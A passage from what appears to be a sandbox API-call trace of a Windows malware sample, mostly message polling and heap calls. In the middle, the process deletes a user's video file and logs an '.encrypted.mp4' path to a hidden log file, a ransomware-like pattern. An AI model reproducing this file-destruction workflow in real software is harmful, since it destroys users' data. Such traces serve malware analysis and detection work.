wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.472] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.472] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.472] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.472] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.472] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.472] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.472] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.472] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.472] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.472] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0042.472] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0042.473] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\eahI4-2wsRei.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ske8zl\\eahi4-2wsrei.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0042.473] FreeLibrary (hLibModule=0x76e10000) returned 1 [0042.473] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.473] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.473] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.473] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0042.474] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.474] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.474] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0042.474] FreeLibrary (hLibModule=0x76e10000) returned 1 [0042.474] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.474] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.474] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.474] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.474] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0042.474] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.474] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.475] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0042.475] FreeLibrary (hLibModule=0x76e10000) returned 1 [0042.475] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.475] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.475] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.475] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\eahI4-2wsRei.mp4", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\eahI4-2wsRei.mp4", lpFilePart=0x0) returned 0x3c [0042.475] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\eahI4-2wsRei.mp4", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18dbab70, ftCreationTime.dwHighDateTime=0x1d5baa4, ftLastAccessTime.dwLowDateTime=0x86f23e40, ftLastAccessTime.dwHighDateTime=0x1d5be63, ftLastWriteTime.dwLowDateTime=0x1906c4a0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x165e8, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="eahI4-2wsRei.mp4", cAlternateFileName="EAHI4-~1.MP4")) returned 0x7c2240 [0042.475] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\eahI4-2wsRei.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ske8zl\\eahi4-2wsrei.mp4")) returned 1 [0042.476] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18dbab70, ftCreationTime.dwHighDateTime=0x1d5baa4, ftLastAccessTime.dwLowDateTime=0x86f23e40, ftLastAccessTime.dwHighDateTime=0x1d5be63, ftLastWriteTime.dwLowDateTime=0x1906c4a0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x165e8, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="eahI4-2wsRei.mp4", cAlternateFileName="EAHI4-~1.MP4")) returned 0 [0042.476] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0042.477] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.477] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0042.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0042.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0042.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0042.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0042.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0042.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0042.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0042.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0042.477] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0042.477] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0042.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0042.478] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0042.478] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0042.478] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.478] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.478] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.478] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0042.478] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0042.478] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0042.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0042.479] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0042.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0042.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0042.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0042.479] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0042.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0042.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0042.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0042.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0042.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0042.480] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0042.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0042.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0042.480] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0042.480] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0042.480] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0042.480] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0042.480] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0042.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0042.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0042.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0042.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0042.480] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0042.480] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x348c, lpOverlapped=0x0) returned 1 [0042.480] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0042.480] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x348c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0042.481] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0042.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0042.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0042.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0042.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0042.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\eahI4-2wsRei.encrypted.mp4\r\n", cchWideChar=73, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 73 [0042.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x49) returned 0x7f36e0 [0042.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\eahI4-2wsRei.encrypted.mp4\r\n", cchWideChar=73, lpMultiByteStr=0x7f36e0, cbMultiByte=73, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\eahI4-2wsRei.encrypted.mp4\r\n", lpUsedDefaultChar=0x0) returned 73 [0042.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0042.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0042.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0042.481] WriteFile (in: hFile=0x128, lpBuffer=0x7f3688*, nNumberOfBytesToWrite=0x48, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f3688*, lpNumberOfBytesWritten=0x6aee3c*=0x48, lpOverlapped=0x0) returned 1 [0042.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0042.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0042.481] CloseHandle (hObject=0x128) returned 1 [0042.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0042.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0042.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0042.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0042.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0042.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0042.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0042.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0042.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0042.485] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0042.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0042.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0042.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0042.486] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0042.486] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0042.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0042.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0042.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0042.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0042.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0042.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0042.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0042.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0042.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0042.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0042.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0042.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0042.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0042.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0042.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0042.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0042.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0042.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0042.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0042.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0042.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0042.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0042.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0042.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0042.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0042.486] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0042.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0042.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0042.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0042.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0042.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0042.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0042.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0042.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0042.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0042.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0042.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0042.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0042.487] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0042.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0042.487] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0042.487] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0042.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0042.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0042.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0042.487] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0042.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0042.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0042.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0042.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5b8 [0042.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0042.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0042.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0042.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0042.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0042.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0042.487] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0042.487] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ca30 [0042.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0042.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0042.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0042.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0042.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0042.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0042.488] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0042.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0042.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0042.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0042.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0042.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0042.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0042.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0042.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0042.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0042.488] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0042.488] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0042.488] RtlAllocateHeap 